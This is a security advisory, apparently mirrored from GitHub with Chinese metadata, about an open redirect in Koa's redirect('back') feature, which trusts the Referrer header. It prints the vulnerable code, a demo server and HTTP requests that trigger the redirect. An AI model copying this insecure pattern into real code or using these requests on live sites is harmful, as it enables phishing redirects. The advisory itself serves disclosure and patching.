Koa Open Redirect via Referrer Header (User-Controlled)

链接： https://github.com/advisories/GHSA-jgmv-j7ww-jx2x

仓库 Star： 35585

CVSS 评分： 3.5

参考链接：

• https://github.com/koajs/koa/security/advisories/GHSA-jgmv-j7ww-jx2x

• https://nvd.nist.gov/vuln/detail/CVE-2025-54420

• https://github.com/koajs/koa/issues/1892

• https://github.com/koajs/koa/issues/1892#issue-3213028583

• https://github.com/koajs/koa/commit/422c551c63d00f24e2bbbdf492f262a5935bb1f0

• https://vuldb.com/?ctiid.317514

• https://vuldb.com/?id.317514

• https://vuldb.com/?submit.619741

• https://github.com/advisories/GHSA-jgmv-j7ww-jx2x

描述：

Summary

In the latest version of Koa, the back method used for redirect operations adopts an insecure implementation, which uses the user-controllable referrer header as the redirect target.

Details

on the API document https://www.koajs.net/api/response#responseredirecturl-alt, we can see:

response.redirect(url, [alt])

Performs a [302] redirect to url.
The string "back" is specially provided for Referrer support, using alt or "/" when Referrer does not exist.

ctx.redirect('back');
ctx.redirect('back', '/index.html');
ctx.redirect('/login');
ctx.redirect('http://google.com');

however, the “back” method is insecure:

• https://github.com/koajs/koa/blob/master/lib/response.js#L322

back (alt) {
  const url = this.ctx.get('Referrer') || alt || '/'
  this.redirect(url)
},

Referrer Header is User-Controlled.

PoC

there is a demo for POC:

const Koa = require('koa')
const serve = require('koa-static')
const Router = require('@koa/router')
const path = require('path')

const app = new Koa()
const router = new Router()

// Serve static files from the public directory
app.use(serve(path.join(__dirname, 'public')))

// Define routes
router.get('/test', ctx => {
  ctx.redirect('back', '/index1.html')
})

router.get('/test2', ctx => {
  ctx.redirect('back')
})

router.get('/', ctx => {
  ctx.body = 'Welcome to the home page! Try accessing /test, /test2'
})

app.use(router.routes())
app.use(router.allowedMethods())

const port = 3000
app.listen(port, () => {
  console.log(`Server running at http://localhost:${port}`)
}) 

Proof Of Concept

GET /test HTTP/1.1
Host: 127.0.0.1:3000
Referer: http://www.baidu.com
Connection: close


GET /test2 HTTP/1.1
Host: 127.0.0.1:3000
Referer: http://www.baidu.com
Connection: close

Impact

https://learn.snyk.io/lesson/open-redirect/